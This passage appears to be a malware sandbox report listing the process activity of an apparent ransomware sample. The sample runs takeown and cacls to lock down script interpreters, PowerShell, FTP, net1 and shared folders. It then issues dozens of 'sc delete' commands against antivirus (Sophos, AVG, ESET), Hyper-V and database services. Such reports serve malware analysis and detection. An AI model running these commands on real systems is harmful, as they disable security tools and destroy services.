    C:\Windows\SysWOW64\takeown.exe -> takeown /f C:\Windows\SysWOW64\net1.exe /a
      - Modifies file permissions
    C:\Windows\SysWOW64\cmd.exe -> C:\Windows\system32\cmd.exe /S /D /c" echo y"
    C:\Windows\SysWOW64\cacls.exe -> cacls C:\Windows\SysWOW64\net1.exe /g Administrators:f
    C:\Windows\SysWOW64\cmd.exe -> C:\Windows\system32\cmd.exe /S /D /c" echo y"
    C:\Windows\SysWOW64\cacls.exe -> cacls C:\Windows\SysWOW64\net1.exe /e /g Users:r
    C:\Windows\SysWOW64\cmd.exe -> C:\Windows\system32\cmd.exe /S /D /c" echo y"
    C:\Windows\SysWOW64\cacls.exe -> cacls C:\Windows\SysWOW64\net1.exe /e /g Administrators:r
    C:\Windows\SysWOW64\cmd.exe -> C:\Windows\system32\cmd.exe /S /D /c" echo y"
    C:\Windows\SysWOW64\cacls.exe -> cacls C:\Windows\SysWOW64\net1.exe /e /d SERVICE
    C:\Windows\SysWOW64\cmd.exe -> C:\Windows\system32\cmd.exe /S /D /c" echo y"
    C:\Windows\SysWOW64\cacls.exe -> cacls C:\Windows\SysWOW64\net1.exe /e /d mssqlserver
    C:\Windows\SysWOW64\cmd.exe -> C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    C:\Windows\SysWOW64\cacls.exe -> cacls C:\Windows\SysWOW64\net1.exe /e /d "network service"
    C:\Windows\SysWOW64\cmd.exe -> C:\Windows\system32\cmd.exe /S /D /c" echo y"
    C:\Windows\SysWOW64\cacls.exe -> cacls C:\Windows\SysWOW64\net1.exe /e /d system
    C:\Windows\SysWOW64\cmd.exe -> C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    C:\Windows\SysWOW64\cacls.exe -> cacls C:\Windows\SysWOW64\net1.exe /e /d mssql$sqlexpress
    C:\Windows\SysWOW64\takeown.exe -> takeown /f C:\Windows\system32\mshta.exe /a
      - Modifies file permissions
      - Suspicious use of AdjustPrivilegeToken
    C:\Windows\SysWOW64\cmd.exe -> C:\Windows\system32\cmd.exe /S /D /c" echo y"
    C:\Windows\SysWOW64\cacls.exe -> cacls C:\Windows\system32\mshta.exe /g Administrators:f
    C:\Windows\SysWOW64\cmd.exe -> C:\Windows\system32\cmd.exe /S /D /c" echo y"
    C:\Windows\SysWOW64\cacls.exe -> cacls C:\Windows\system32\mshta.exe /e /g Users:r
    C:\Windows\SysWOW64\cmd.exe -> C:\Windows\system32\cmd.exe /S /D /c" echo y"
    C:\Windows\SysWOW64\cacls.exe -> cacls C:\Windows\system32\mshta.exe /e /g Administrators:r
    C:\Windows\SysWOW64\cmd.exe -> C:\Windows\system32\cmd.exe /S /D /c" echo y"
    C:\Windows\SysWOW64\cacls.exe -> cacls C:\Windows\system32\mshta.exe /e /d SERVICE
    C:\Windows\SysWOW64\cmd.exe -> C:\Windows\system32\cmd.exe /S /D /c" echo y"
    C:\Windows\SysWOW64\cacls.exe -> cacls C:\Windows\system32\mshta.exe /e /d mssqlserver
    C:\Windows\SysWOW64\cmd.exe -> C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    C:\Windows\SysWOW64\cacls.exe -> cacls C:\Windows\system32\mshta.exe /e /d "network service"
    C:\Windows\SysWOW64\cmd.exe -> C:\Windows\system32\cmd.exe /S /D /c" echo y"
    C:\Windows\SysWOW64\cacls.exe -> cacls C:\Windows\system32\mshta.exe /e /d system
    C:\Windows\SysWOW64\cmd.exe -> C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    C:\Windows\SysWOW64\cacls.exe -> cacls C:\Windows\system32\mshta.exe /e /d mssql$sqlexpress
    C:\Windows\SysWOW64\takeown.exe -> takeown /f C:\Windows\SysWOW64\mshta.exe /a
      - Modifies file permissions
    C:\Windows\SysWOW64\cmd.exe -> C:\Windows\system32\cmd.exe /S /D /c" echo y"
    C:\Windows\SysWOW64\cacls.exe -> cacls C:\Windows\SysWOW64\mshta.exe /g Administrators:f
    C:\Windows\SysWOW64\cmd.exe -> C:\Windows\system32\cmd.exe /S /D /c" echo y"
    C:\Windows\SysWOW64\cacls.exe -> cacls C:\Windows\SysWOW64\mshta.exe /e /g Users:r
    C:\Windows\SysWOW64\cmd.exe -> C:\Windows\system32\cmd.exe /S /D /c" echo y"
    C:\Windows\SysWOW64\cacls.exe -> cacls C:\Windows\SysWOW64\mshta.exe /e /g Administrators:r
    C:\Windows\SysWOW64\cmd.exe -> C:\Windows\system32\cmd.exe /S /D /c" echo y"
    C:\Windows\SysWOW64\cacls.exe -> cacls C:\Windows\SysWOW64\mshta.exe /e /d SERVICE
    C:\Windows\SysWOW64\cmd.exe -> C:\Windows\system32\cmd.exe /S /D /c" echo y"
    C:\Windows\SysWOW64\cacls.exe -> cacls C:\Windows\SysWOW64\mshta.exe /e /d mssqlserver
    C:\Windows\SysWOW64\cmd.exe -> C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    C:\Windows\SysWOW64\cacls.exe -> cacls C:\Windows\SysWOW64\mshta.exe /e /d "network service"
    C:\Windows\SysWOW64\cmd.exe -> C:\Windows\system32\cmd.exe /S /D /c" echo y"
    C:\Windows\SysWOW64\cacls.exe -> cacls C:\Windows\SysWOW64\mshta.exe /e /d system
    C:\Windows\SysWOW64\cmd.exe -> C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    C:\Windows\SysWOW64\cacls.exe -> cacls C:\Windows\SysWOW64\mshta.exe /e /d mssql$sqlexpress
    C:\Windows\SysWOW64\takeown.exe -> takeown /f C:\Windows\system32\FTP.exe /a
      - Modifies file permissions
      - Suspicious use of AdjustPrivilegeToken
    C:\Windows\SysWOW64\cmd.exe -> C:\Windows\system32\cmd.exe /S /D /c" echo y"
    C:\Windows\SysWOW64\cacls.exe -> cacls C:\Windows\system32\FTP.exe /g Administrators:f
    C:\Windows\SysWOW64\cmd.exe -> C:\Windows\system32\cmd.exe /S /D /c" echo y"
    C:\Windows\SysWOW64\cacls.exe -> cacls C:\Windows\system32\FTP.exe /e /g Users:r
    C:\Windows\SysWOW64\cmd.exe -> C:\Windows\system32\cmd.exe /S /D /c" echo y"
    C:\Windows\SysWOW64\cacls.exe -> cacls C:\Windows\system32\FTP.exe /e /g Administrators:r
    C:\Windows\SysWOW64\cmd.exe -> C:\Windows\system32\cmd.exe /S /D /c" echo y"
    C:\Windows\SysWOW64\cacls.exe -> cacls C:\Windows\system32\FTP.exe /e /d SERVICE
    C:\Windows\SysWOW64\cmd.exe -> C:\Windows\system32\cmd.exe /S /D /c" echo y"
    C:\Windows\SysWOW64\cacls.exe -> cacls C:\Windows\system32\FTP.exe /e /d mssqlserver
    C:\Windows\SysWOW64\cmd.exe -> C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    C:\Windows\SysWOW64\cacls.exe -> cacls C:\Windows\system32\FTP.exe /e /d "network service"
    C:\Windows\SysWOW64\cmd.exe -> C:\Windows\system32\cmd.exe /S /D /c" echo y"
    C:\Windows\SysWOW64\cacls.exe -> cacls C:\Windows\system32\FTP.exe /e /d system
    C:\Windows\SysWOW64\cmd.exe -> C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    C:\Windows\SysWOW64\cacls.exe -> cacls C:\Windows\system32\FTP.exe /e /d mssql$sqlexpress
    C:\Windows\SysWOW64\takeown.exe -> takeown /f C:\Windows\SysWOW64\FTP.exe /a
      - Modifies file permissions
    C:\Windows\SysWOW64\cmd.exe -> C:\Windows\system32\cmd.exe /S /D /c" echo y"
    C:\Windows\SysWOW64\cacls.exe -> cacls C:\Windows\SysWOW64\FTP.exe /g Administrators:f
    C:\Windows\SysWOW64\cmd.exe -> C:\Windows\system32\cmd.exe /S /D /c" echo y"
    C:\Windows\SysWOW64\cacls.exe -> cacls C:\Windows\SysWOW64\FTP.exe /e /g Users:r
    C:\Windows\SysWOW64\cmd.exe -> C:\Windows\system32\cmd.exe /S /D /c" echo y"
    C:\Windows\SysWOW64\cacls.exe -> cacls C:\Windows\SysWOW64\FTP.exe /e /g Administrators:r
    C:\Windows\SysWOW64\cmd.exe -> C:\Windows\system32\cmd.exe /S /D /c" echo y"
    C:\Windows\SysWOW64\cacls.exe -> cacls C:\Windows\SysWOW64\FTP.exe /e /d SERVICE
    C:\Windows\SysWOW64\cmd.exe -> C:\Windows\system32\cmd.exe /S /D /c" echo y"
    C:\Windows\SysWOW64\cacls.exe -> cacls C:\Windows\SysWOW64\FTP.exe /e /d mssqlserver
    C:\Windows\SysWOW64\cmd.exe -> C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    C:\Windows\SysWOW64\cacls.exe -> cacls C:\Windows\SysWOW64\FTP.exe /e /d "network service"
    C:\Windows\SysWOW64\cmd.exe -> C:\Windows\system32\cmd.exe /S /D /c" echo y"
    C:\Windows\SysWOW64\cacls.exe -> cacls C:\Windows\SysWOW64\FTP.exe /e /d system
    C:\Windows\SysWOW64\cmd.exe -> C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    C:\Windows\SysWOW64\cacls.exe -> cacls C:\Windows\SysWOW64\FTP.exe /e /d mssql$sqlexpress
    C:\Windows\SysWOW64\takeown.exe -> takeown /f C:\Windows\system32\wscript.exe /a
      - Modifies file permissions
      - Suspicious use of AdjustPrivilegeToken
    C:\Windows\SysWOW64\cmd.exe -> C:\Windows\system32\cmd.exe /S /D /c" echo y"
    C:\Windows\SysWOW64\cacls.exe -> cacls C:\Windows\system32\wscript.exe /g Administrators:f
    C:\Windows\SysWOW64\cmd.exe -> C:\Windows\system32\cmd.exe /S /D /c" echo y"
    C:\Windows\SysWOW64\cacls.exe -> cacls C:\Windows\system32\wscript.exe /e /g Users:r
    C:\Windows\SysWOW64\cmd.exe -> C:\Windows\system32\cmd.exe /S /D /c" echo y"
    C:\Windows\SysWOW64\cacls.exe -> cacls C:\Windows\system32\wscript.exe /e /g Administrators:r
    C:\Windows\SysWOW64\cacls.exe -> cacls C:\Windows\system32\wscript.exe /e /d SERVICE
    C:\Windows\SysWOW64\cmd.exe -> C:\Windows\system32\cmd.exe /S /D /c" echo y"
    C:\Windows\SysWOW64\cmd.exe -> C:\Windows\system32\cmd.exe /S /D /c" echo y"
    C:\Windows\SysWOW64\cacls.exe -> cacls C:\Windows\system32\wscript.exe /e /d mssqlserver
    C:\Windows\SysWOW64\cmd.exe -> C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    C:\Windows\SysWOW64\cacls.exe -> cacls C:\Windows\system32\wscript.exe /e /d "network service"
    C:\Windows\SysWOW64\cmd.exe -> C:\Windows\system32\cmd.exe /S /D /c" echo y"
    C:\Windows\SysWOW64\cacls.exe -> cacls C:\Windows\system32\wscript.exe /e /d system
    C:\Windows\SysWOW64\cmd.exe -> C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    C:\Windows\SysWOW64\cacls.exe -> cacls C:\Windows\system32\wscript.exe /e /d mssql$sqlexpress
    C:\Windows\SysWOW64\takeown.exe -> takeown /f C:\Windows\SysWOW64\wscript.exe /a
      - Modifies file permissions
    C:\Windows\SysWOW64\cmd.exe -> C:\Windows\system32\cmd.exe /S /D /c" echo y"
    C:\Windows\SysWOW64\cacls.exe -> cacls C:\Windows\SysWOW64\wscript.exe /g Administrators:f
    C:\Windows\SysWOW64\cmd.exe -> C:\Windows\system32\cmd.exe /S /D /c" echo y"
    C:\Windows\SysWOW64\cacls.exe -> cacls C:\Windows\SysWOW64\wscript.exe /e /g Users:r
    C:\Windows\SysWOW64\cmd.exe -> C:\Windows\system32\cmd.exe /S /D /c" echo y"
    C:\Windows\SysWOW64\cacls.exe -> cacls C:\Windows\SysWOW64\wscript.exe /e /g Administrators:r
    C:\Windows\SysWOW64\cmd.exe -> C:\Windows\system32\cmd.exe /S /D /c" echo y"
    C:\Windows\SysWOW64\cacls.exe -> cacls C:\Windows\SysWOW64\wscript.exe /e /d SERVICE
    C:\Windows\SysWOW64\cmd.exe -> C:\Windows\system32\cmd.exe /S /D /c" echo y"
    C:\Windows\SysWOW64\cacls.exe -> cacls C:\Windows\SysWOW64\wscript.exe /e /d mssqlserver
    C:\Windows\SysWOW64\cmd.exe -> C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    C:\Windows\SysWOW64\cacls.exe -> cacls C:\Windows\SysWOW64\wscript.exe /e /d "network service"
    C:\Windows\SysWOW64\cmd.exe -> C:\Windows\system32\cmd.exe /S /D /c" echo y"
    C:\Windows\SysWOW64\cacls.exe -> cacls C:\Windows\SysWOW64\wscript.exe /e /d system
    C:\Windows\SysWOW64\cmd.exe -> C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    C:\Windows\SysWOW64\cacls.exe -> cacls C:\Windows\SysWOW64\wscript.exe /e /d mssql$sqlexpress
    C:\Windows\SysWOW64\takeown.exe -> takeown /f C:\Windows\system32\cscript.exe /a
      - Modifies file permissions
      - Suspicious use of AdjustPrivilegeToken
    C:\Windows\SysWOW64\cmd.exe -> C:\Windows\system32\cmd.exe /S /D /c" echo y"
    C:\Windows\SysWOW64\cacls.exe -> cacls C:\Windows\system32\cscript.exe /g Administrators:f
    C:\Windows\SysWOW64\cmd.exe -> C:\Windows\system32\cmd.exe /S /D /c" echo y"
    C:\Windows\SysWOW64\cacls.exe -> cacls C:\Windows\system32\cscript.exe /e /g Users:r
    C:\Windows\SysWOW64\cmd.exe -> C:\Windows\system32\cmd.exe /S /D /c" echo y"
    C:\Windows\SysWOW64\cacls.exe -> cacls C:\Windows\system32\cscript.exe /e /g Administrators:r
    C:\Windows\SysWOW64\cmd.exe -> C:\Windows\system32\cmd.exe /S /D /c" echo y"
    C:\Windows\SysWOW64\cacls.exe -> cacls C:\Windows\system32\cscript.exe /e /d SERVICE
    C:\Windows\SysWOW64\cmd.exe -> C:\Windows\system32\cmd.exe /S /D /c" echo y"
    C:\Windows\SysWOW64\cacls.exe -> cacls C:\Windows\system32\cscript.exe /e /d mssqlserver
    C:\Windows\SysWOW64\cmd.exe -> C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    C:\Windows\SysWOW64\cacls.exe -> cacls C:\Windows\system32\cscript.exe /e /d "network service"
    C:\Windows\SysWOW64\cmd.exe -> C:\Windows\system32\cmd.exe /S /D /c" echo y"
    C:\Windows\SysWOW64\cacls.exe -> cacls C:\Windows\system32\cscript.exe /e /d system
    C:\Windows\SysWOW64\cmd.exe -> C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    C:\Windows\SysWOW64\cacls.exe -> cacls C:\Windows\system32\cscript.exe /e /d mssql$sqlexpress
    C:\Windows\SysWOW64\takeown.exe -> takeown /f C:\Windows\SysWOW64\cscript.exe /a
      - Modifies file permissions
    C:\Windows\SysWOW64\cmd.exe -> C:\Windows\system32\cmd.exe /S /D /c" echo y"
    C:\Windows\SysWOW64\cacls.exe -> cacls C:\Windows\SysWOW64\cscript.exe /g Administrators:f
    C:\Windows\SysWOW64\cmd.exe -> C:\Windows\system32\cmd.exe /S /D /c" echo y"
    C:\Windows\SysWOW64\cacls.exe -> cacls C:\Windows\SysWOW64\cscript.exe /e /g Users:r
    C:\Windows\SysWOW64\cacls.exe -> cacls C:\Windows\SysWOW64\cscript.exe /e /g Administrators:r
    C:\Windows\SysWOW64\cmd.exe -> C:\Windows\system32\cmd.exe /S /D /c" echo y"
    C:\Windows\SysWOW64\cmd.exe -> C:\Windows\system32\cmd.exe /S /D /c" echo y"
    C:\Windows\SysWOW64\cacls.exe -> cacls C:\Windows\SysWOW64\cscript.exe /e /d SERVICE
    C:\Windows\SysWOW64\cmd.exe -> C:\Windows\system32\cmd.exe /S /D /c" echo y"
    C:\Windows\SysWOW64\cacls.exe -> cacls C:\Windows\SysWOW64\cscript.exe /e /d mssqlserver
    C:\Windows\SysWOW64\cmd.exe -> C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    C:\Windows\SysWOW64\cacls.exe -> cacls C:\Windows\SysWOW64\cscript.exe /e /d "network service"
    C:\Windows\SysWOW64\cmd.exe -> C:\Windows\system32\cmd.exe /S /D /c" echo y"
    C:\Windows\SysWOW64\cacls.exe -> cacls C:\Windows\SysWOW64\cscript.exe /e /d system
    C:\Windows\SysWOW64\cmd.exe -> C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    C:\Windows\SysWOW64\cacls.exe -> cacls C:\Windows\SysWOW64\cscript.exe /e /d mssql$sqlexpress
    C:\Windows\SysWOW64\takeown.exe -> takeown /f C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe /a
      - Modifies file permissions
      - Suspicious use of AdjustPrivilegeToken
    C:\Windows\SysWOW64\cmd.exe -> C:\Windows\system32\cmd.exe /S /D /c" echo y"
    C:\Windows\SysWOW64\cacls.exe -> cacls C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe /g Administrators:f
    C:\Windows\SysWOW64\cmd.exe -> C:\Windows\system32\cmd.exe /S /D /c" echo y"
    C:\Windows\SysWOW64\cacls.exe -> cacls C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe /e /g Users:r
    C:\Windows\SysWOW64\cmd.exe -> C:\Windows\system32\cmd.exe /S /D /c" echo y"
    C:\Windows\SysWOW64\cacls.exe -> cacls C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe /e /g Administrators:r
    C:\Windows\SysWOW64\cacls.exe -> cacls C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe /e /d SERVICE
    C:\Windows\SysWOW64\cmd.exe -> C:\Windows\system32\cmd.exe /S /D /c" echo y"
    C:\Windows\SysWOW64\cmd.exe -> C:\Windows\system32\cmd.exe /S /D /c" echo y"
    C:\Windows\SysWOW64\cacls.exe -> cacls C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe /e /d mssqlserver
    C:\Windows\SysWOW64\cmd.exe -> C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    C:\Windows\SysWOW64\cacls.exe -> cacls C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe /e /d "network service"
    C:\Windows\SysWOW64\cmd.exe -> C:\Windows\system32\cmd.exe /S /D /c" echo y"
    C:\Windows\SysWOW64\cacls.exe -> cacls C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe /e /d system
    C:\Windows\SysWOW64\cmd.exe -> C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    C:\Windows\SysWOW64\cacls.exe -> cacls C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe /e /d mssql$sqlexpress
    C:\Windows\SysWOW64\takeown.exe -> takeown /f C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /a
      - Modifies file permissions
    C:\Windows\SysWOW64\cmd.exe -> C:\Windows\system32\cmd.exe /S /D /c" echo y"
    C:\Windows\SysWOW64\cacls.exe -> cacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /g Administrators:f
    C:\Windows\SysWOW64\cmd.exe -> C:\Windows\system32\cmd.exe /S /D /c" echo y"
    C:\Windows\SysWOW64\cacls.exe -> cacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /g Users:r
    C:\Windows\SysWOW64\cmd.exe -> C:\Windows\system32\cmd.exe /S /D /c" echo y"
    C:\Windows\SysWOW64\cacls.exe -> cacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /g Administrators:r
    C:\Windows\SysWOW64\cmd.exe -> C:\Windows\system32\cmd.exe /S /D /c" echo y"
    C:\Windows\SysWOW64\cacls.exe -> cacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /d SERVICE
    C:\Windows\SysWOW64\cmd.exe -> C:\Windows\system32\cmd.exe /S /D /c" echo y"
    C:\Windows\SysWOW64\cacls.exe -> cacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /d mssqlserver
    C:\Windows\SysWOW64\cmd.exe -> C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    C:\Windows\SysWOW64\cacls.exe -> cacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /d "network service"
    C:\Windows\SysWOW64\cmd.exe -> C:\Windows\system32\cmd.exe /S /D /c" echo y"
    C:\Windows\SysWOW64\cacls.exe -> cacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /d system
    C:\Windows\SysWOW64\cmd.exe -> C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    C:\Windows\SysWOW64\cacls.exe -> cacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /d mssql$sqlexpress
    C:\Windows\SysWOW64\takeown.exe -> takeown /f C:\ProgramData /a
      - Modifies file permissions
    C:\Windows\SysWOW64\cmd.exe -> C:\Windows\system32\cmd.exe /S /D /c" echo y"
    C:\Windows\SysWOW64\cacls.exe -> cacls C:\ProgramData /g Administrators:f
    C:\Windows\SysWOW64\cmd.exe -> C:\Windows\system32\cmd.exe /S /D /c" echo y"
    C:\Windows\SysWOW64\cacls.exe -> cacls C:\ProgramData /e /g Users:r
    C:\Windows\SysWOW64\cmd.exe -> C:\Windows\system32\cmd.exe /S /D /c" echo y"
    C:\Windows\SysWOW64\cacls.exe -> cacls C:\ProgramData /e /g Administrators:r
    C:\Windows\SysWOW64\cmd.exe -> C:\Windows\system32\cmd.exe /S /D /c" echo y"
    C:\Windows\SysWOW64\cacls.exe -> cacls C:\ProgramData /e /d SERVICE
    C:\Windows\SysWOW64\cmd.exe -> C:\Windows\system32\cmd.exe /S /D /c" echo y"
    C:\Windows\SysWOW64\cacls.exe -> cacls C:\ProgramData /e /d mssqlserver
    C:\Windows\SysWOW64\cmd.exe -> C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    C:\Windows\SysWOW64\cacls.exe -> cacls C:\ProgramData /e /d "network service"
    C:\Windows\SysWOW64\cmd.exe -> C:\Windows\system32\cmd.exe /S /D /c" echo y"
    C:\Windows\SysWOW64\cacls.exe -> cacls C:\ProgramData /e /d system
    C:\Windows\SysWOW64\cmd.exe -> C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    C:\Windows\SysWOW64\cacls.exe -> cacls C:\ProgramData /e /d mssql$sqlexpress
    C:\Windows\SysWOW64\takeown.exe -> takeown /f C:\Users\Public /a
      - Modifies file permissions
    C:\Windows\SysWOW64\cmd.exe -> C:\Windows\system32\cmd.exe /S /D /c" echo y"
    C:\Windows\SysWOW64\cacls.exe -> cacls C:\Users\Public /g Administrators:f
    C:\Windows\SysWOW64\cacls.exe -> cacls C:\Users\Public /e /g Users:r
    C:\Windows\SysWOW64\cmd.exe -> C:\Windows\system32\cmd.exe /S /D /c" echo y"
    C:\Windows\SysWOW64\cmd.exe -> C:\Windows\system32\cmd.exe /S /D /c" echo y"
    C:\Windows\SysWOW64\cacls.exe -> cacls C:\Users\Public /e /g Administrators:r
    C:\Windows\SysWOW64\cmd.exe -> C:\Windows\system32\cmd.exe /S /D /c" echo y"
    C:\Windows\SysWOW64\cacls.exe -> cacls C:\Users\Public /e /d SERVICE
    C:\Windows\SysWOW64\cacls.exe -> cacls C:\Users\Public /e /d mssqlserver
    C:\Windows\SysWOW64\cmd.exe -> C:\Windows\system32\cmd.exe /S /D /c" echo y"
    C:\Windows\SysWOW64\cmd.exe -> C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    C:\Windows\SysWOW64\cacls.exe -> cacls C:\Users\Public /e /d "network service"
    C:\Windows\SysWOW64\cmd.exe -> C:\Windows\system32\cmd.exe /S /D /c" echo y"
    C:\Windows\SysWOW64\cacls.exe -> cacls C:\Users\Public /e /d system
    C:\Windows\SysWOW64\cmd.exe -> C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    C:\Windows\SysWOW64\cacls.exe -> cacls C:\Users\Public /e /d mssql$sqlexpress
    C:\Windows\SysWOW64\sc.exe -> sc delete "vmickvpexchange"
      - Launches sc.exe
    C:\Windows\SysWOW64\sc.exe -> sc delete "vmicguestinterface"
      - Launches sc.exe
    C:\Windows\SysWOW64\sc.exe -> sc delete "vmicshutdown"
      - Launches sc.exe
    C:\Windows\SysWOW64\sc.exe -> sc delete "vmicheartbeat"
    C:\Windows\SysWOW64\sc.exe -> sc delete "vmicrdv"
      - Launches sc.exe
    C:\Windows\SysWOW64\sc.exe -> sc delete "storflt"
      - Launches sc.exe
    C:\Windows\SysWOW64\sc.exe -> sc delete "vmictimesync"
      - Launches sc.exe
    C:\Windows\SysWOW64\sc.exe -> sc delete "vmicvss"
      - Launches sc.exe
    C:\Windows\SysWOW64\sc.exe -> sc delete "hvdsvc"
    C:\Windows\SysWOW64\sc.exe -> sc delete "nvspwmi"
      - Launches sc.exe
    C:\Windows\SysWOW64\sc.exe -> sc delete "wmms"
      - Launches sc.exe
    C:\Windows\SysWOW64\sc.exe -> sc delete "AvgAdminServer"
    C:\Windows\SysWOW64\sc.exe -> sc delete "AVG Antivirus"
    C:\Windows\SysWOW64\sc.exe -> sc delete "avgAdminClient"
      - Launches sc.exe
    C:\Windows\SysWOW64\sc.exe -> sc delete "SAVService"
      - Launches sc.exe
    C:\Windows\SysWOW64\sc.exe -> sc delete "SAVAdminService"
    C:\Windows\SysWOW64\sc.exe -> sc delete "Sophos AutoUpdate Service"
      - Launches sc.exe
    C:\Windows\SysWOW64\sc.exe -> sc delete "Sophos Clean Service"
    C:\Windows\SysWOW64\sc.exe -> sc delete "Sophos Device Control Service"
      - Launches sc.exe
    C:\Windows\SysWOW64\sc.exe -> sc delete "Sophos Endpoint Defense Service"
      - Launches sc.exe
    C:\Windows\SysWOW64\sc.exe -> sc delete "Sophos File Scanner Service"
      - Launches sc.exe
    C:\Windows\SysWOW64\sc.exe -> sc delete "Sophos Health Service"
    C:\Windows\SysWOW64\sc.exe -> sc delete "Sophos MCS Agent"
      - Launches sc.exe
    C:\Windows\SysWOW64\sc.exe -> sc delete "Sophos MCS Client"
      - Launches sc.exe
    C:\Windows\SysWOW64\sc.exe -> sc delete "SntpService"
      - Launches sc.exe
    C:\Windows\SysWOW64\sc.exe -> sc delete "swc_service"
    C:\Windows\SysWOW64\sc.exe -> sc delete "swi_service"
    C:\Windows\SysWOW64\sc.exe -> sc delete "Sophos UI"
      - Launches sc.exe
    C:\Windows\SysWOW64\sc.exe -> sc delete "swi_update"
    C:\Windows\SysWOW64\sc.exe -> sc delete "Sophos Web Control Service"
    C:\Windows\SysWOW64\sc.exe -> sc delete "Sophos System Protection Service"
    C:\Windows\SysWOW64\sc.exe -> sc delete "Sophos Safestore Service"
    C:\Windows\SysWOW64\sc.exe -> sc delete "hmpalertsvc"
      - Launches sc.exe
    C:\Windows\SysWOW64\sc.exe -> sc delete "RpcEptMapper"
    C:\Windows\SysWOW64\sc.exe -> sc delete "Sophos Endpoint Defense Service"
    C:\Windows\SysWOW64\sc.exe -> sc delete "SophosFIM"
      - Launches sc.exe
    C:\Windows\SysWOW64\sc.exe -> sc delete "swi_filter"
    C:\Windows\SysWOW64\sc.exe -> sc delete "FirebirdGuardianDefaultInstance"
    C:\Windows\SysWOW64\sc.exe -> sc delete "FirebirdServerDefaultInstance"
      - Launches sc.exe
    C:\Windows\SysWOW64\sc.exe -> sc delete "MSSQLFDLauncher"
    C:\Windows\SysWOW64\sc.exe -> sc delete "MSSQLSERVER"
    C:\Windows\SysWOW64\sc.exe -> sc delete "SQLSERVERAGENT"
    C:\Windows\SysWOW64\sc.exe -> sc delete "SQLBrowser"
      - Launches sc.exe
    C:\Windows\SysWOW64\sc.exe -> sc delete "SQLTELEMETRY"
    C:\Windows\SysWOW64\sc.exe -> sc delete "MsDtsServer130"
      - Launches sc.exe
    C:\Windows\SysWOW64\sc.exe -> sc delete "SSISTELEMETRY130"
    C:\Windows\SysWOW64\sc.exe -> sc delete "SQLWriter"
    C:\Windows\SysWOW64\sc.exe -> sc delete "MSSQL$VEEAMSQL2012"
    C:\Windows\SysWOW64\sc.exe -> sc delete "SQLAgent$VEEAMSQL2012"
    C:\Windows\SysWOW64\sc.exe -> sc delete "MSSQL"
      - Launches sc.exe
    C:\Windows\SysWOW64\sc.exe -> sc delete "SQLAgent"
    C:\Windows\SysWOW64\sc.exe -> sc delete "MSSQLServerADHelper100"
      - Launches sc.exe
    C:\Windows\SysWOW64\sc.exe -> sc delete "MSSQLServerOLAPService"
      - Launches sc.exe
    C:\Windows\SysWOW64\sc.exe -> sc delete "MsDtsServer100"
    C:\Windows\SysWOW64\sc.exe -> sc delete "ReportServer"
      - Launches sc.exe
    C:\Windows\SysWOW64\sc.exe -> sc delete "SQLTELEMETRY$HL"
    C:\Windows\SysWOW64\sc.exe -> sc delete "TMBMServer"
    C:\Windows\SysWOW64\sc.exe -> sc delete "MSSQL$PROGID"
    C:\Windows\SysWOW64\sc.exe -> sc delete "MSSQL$WOLTERSKLUWER"
      - Launches sc.exe
    C:\Windows\SysWOW64\sc.exe -> sc delete "SQLAgent$PROGID"
    C:\Windows\SysWOW64\sc.exe -> sc delete "SQLAgent$WOLTERSKLUWER"
    C:\Windows\SysWOW64\sc.exe -> sc delete "MSSQLFDLauncher$OPTIMA"
    C:\Windows\SysWOW64\sc.exe -> sc delete "MSSQL$OPTIMA"
      - Launches sc.exe
    C:\Windows\SysWOW64\sc.exe -> sc delete "SQLAgent$OPTIMA"
      - Launches sc.exe
    C:\Windows\SysWOW64\sc.exe -> sc delete "ReportServer$OPTIMA"
      - Launches sc.exe
    C:\Windows\SysWOW64\sc.exe -> sc delete "msftesql$SQLEXPRESS"
      - Launches sc.exe
    C:\Windows\SysWOW64\sc.exe -> sc delete "postgresql-x64-9.4"
      - Launches sc.exe
    C:\Windows\SysWOW64\sc.exe -> sc delete "WRSVC"
      - Launches sc.exe
    C:\Windows\SysWOW64\sc.exe -> sc delete "ekrn"
      - Launches sc.exe
    C:\Windows\SysWOW64\sc.exe -> sc delete "ekrnEpsw"
